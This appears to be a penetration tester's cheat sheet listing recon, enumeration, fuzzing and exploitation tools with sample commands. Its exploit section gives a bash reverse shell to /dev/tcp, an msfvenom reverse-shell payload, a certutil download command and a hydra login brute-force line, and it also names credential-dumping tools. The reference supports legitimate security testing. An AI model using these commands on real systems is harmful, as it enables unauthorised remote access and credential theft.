Skip to content

Penetration Test

Information Gathering

Search Engine

  • SHODAN

    Search Engine for the Internet of Everything

    # Search Query
#   <keyword> ...
#   [{[-(filter out)]<attr>:<value>,...(or)} ...(and)]
#     country:{<country>|tw|us}

hostname:google.com,facebook.com
http.html:"index of" country:tw
Microsoft-IIS port:8530,8531 country:tw -http.status:403  # WSUS

  • Censys

    Censys helps organizations, individuals, and researchers find and monitor every server on the Internet to reduce exposure and improve security

  • Google Hacking Database

OSINT

  • OSINT Framework

  • maltego

    A platform for open-source intelligence (OSINT) and cyber investigations

DNS Enumeration

  • dnsdumpster

    dns recon & research, find & lookup dns records

  • crt.sh

    Enter an Identity (Domain Name, Organization Name, etc)

  • robtex

    Subdomains

  • dnsenum

    # dnsenum
#   [--noreverse]
#   [--recursion]
#   <domain>

dnsenum google.com

  • gobuster

    # gobuster vhost
#   [-H, --headers="<key>:<value>" ...]
#   [--exclude-length={<length>|<length>-<length>},...]
#   [--append-domain] --domain=<domain>
#   -w, --wordlist=<wordlist>
#   -u, --url=<url>

gobuster vhost --exclude-length=100,200-300 --append-domain --domain=${domain:?} --wordlist=/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --url=http://${domain:?}

  • knockpy.py

Domain Information

DNS Lookup

  • dig

    # dig
#   [@<server>]
#   {<name>|-x <addr>} ...
#   [<type>|A|MX|NS|TXT|CNAME]
#   [{+<option>|+trace|+https|+nssearch} ...]

dig @8.8.8.8 www.google.com A
dig www.google.com A +trace
dig google.com +nssearch

dig -x 8.8.8.8

  • nslookup

    # nslookup
#   [{-type={<type>|A}|-<option>[=<value>]} ...]
#   {<name>|<addr>}
#   [<server>]

nslookup -type=A www.google.com 8.8.8.8

nslookup 8.8.8.8

  • drill

    # drill
#   [-T(enable trace)]
#   {<name>|-x <addr>}
#   [@<server>]
#   [<type>|A]

drill www.google.com @8.8.8.8 A
drill -T www.google.com          # trace

drill -x 8.8.8.8

Recon

Port Scanning

  • Nmap

    # nmap
#   [-v(verbose)]
#   [-n(disable DNS resolution)]
#   [-T{0..5}(5 is fastest)]
#   [-A(same as -O -sV -sC --traceroute)]
#   [-Pn(skip host discovery)]
#   [-sn(disable port scan)]
#   [-O(enable OS detection)]
#   [-sS(TCP SYN, default)]
#   [-sU(UDP scan)]
#   [-sC(same as --script=default)]
#   [-sV(show service version info)]
#   [--script={<pattern>|"http-*"|default|*},...]
#   [--script-trace]
#   [--script-help <pattern>(/usr/share/nmap/scripts)]
#   [-p {-|{[T:|U:]{<port>|<port>-<port>},...},...}]
#   {<hostname>|<ip>|<ip range>|<subnet>}

nmap -A ${host:?}                      # Scan with default setting.
nmap --script="http-*" -p80 ${host:?}  # Scan HTTP service.
nmap -v -n -T5 -sS -p- ${host:?}       # Scan all ports.
nmap -v -n -sCV -p- ${host:?}          # Scan all ports with extra info.

Directory Enumeration

  • dirsearch

    # dirsearch
#   [-m, --http-method=<method>]
#   [-H, --header="<name>: <value>" ...]
#   [--cookie="<name>=<value>;..."]
#   [-e, --extensions={<extension>|php|asp},...(only replaces %EXT% by default)]
#   [-f, --force-extensions]
#   [--prefixes=<prefix>,...]
#   [--suffixes=<suffix>,...]
#   [-r, --recursive]
#   [--crawl]
#   [-i, --include-status={<code>|<code>-<code>},...]
#   [-x, --exclude-status={<code>|<code>-<code>},...]
#   [--exclude-text=<text> ...]
#   [--exclude-regex=<regex> ...]
#   [--exclude-redirect=<redirect url> ...]
#   -u, --url=<url>

dirsearch -r -u ${url:?}

  • gobuster

    # gobuster dir

gobuster dir --url ${url:?} --wordlist ${wordlist:-/usr/share/wordlists/dirb/common.txt} -t ${threads:-100}

  • dirbuster

    # dirbuster

  • dirb

    # dirb
#   [-H <header_string>]
#   [-c <cookie_string]
#   [-X {<extension>|.html}]
#   [-N <status_code>(ignore responses with this code)]
#   <url>
#   [<wordlist>,...]

dirb ${url:?} ${wordlist}

  • wfuzz

    wfuzz -c -z file,${wordlist:-/usr/share/wordlists/dirb/common.txt} -hc ${hidecode:-404} ${url:?}/FUZZ

  • ffuf

Secret Dumper

  • git-dumper

Fuzzing

  • wfuzz

    Usage Description
    $ wfuzz -c -z file,${wordlist:?} -hl ${hideline:-BBB} ${url:?}/?FUZZ{<baseArg1>}=,FUZ2Z{<baseArg2>}= Hide all results with same line count to the result queried by parameter and .

Tech Stack

Connection

  • /dev/tcp/<HOST>/<PORT>
  • telnet
  • nc / ncat / socat
  • $ certutil.exe -urlcache -f <url> <filename>
  • HTTPie

Intercepting Proxy

  • Burpsuit
  • ModHeader

Public Temp Server

  • webhook.site
    • unique URL (https / CORS)
    • unique email
  • beeceptor
  • hookbin.com
  • requestbin.net

Vulnerability Scanner

  • nikto
  • OpenVAS
  • trivy
  • ZAP

Exploit

Backdoor

  • weevely
  • veil
  • BeEF
  • cobaltstrike

Reverse Shell

Enable PTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

  • $ bash -c "/bin/bash -i >& /dev/tcp/${HOST}/${PORT} 0<&1"
  • reverse ICMP shell (icmpsh)
  • $ msfvenom --list payloads
    • $ msfvenom -p windows/x64/shell_reverse_tcp -f aspx -o reverse.aspx LHOST=${host} LPORT=1337

Secret

Credential Harvesting

  • Responder
  • Inveigh
  • Mimikatz
  • ntdsutil
  • secretsdump

Cracker

  • unt-wister
  • c-jwt-cracker

  • Password Cracker

    • hashcat
    • John the Ripper

  • Login Cracker

    • hydra

      $ hydra -l <username> -P /usr/share/wordlists/nmap.lst <server> http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password"

Word List

  • wordlists
  • seclists
  • crunch

Decrypt

  • pyCryptodome

  • Crypto.Util.number

    Function Comment
    inverse modulus inverse

  • Sage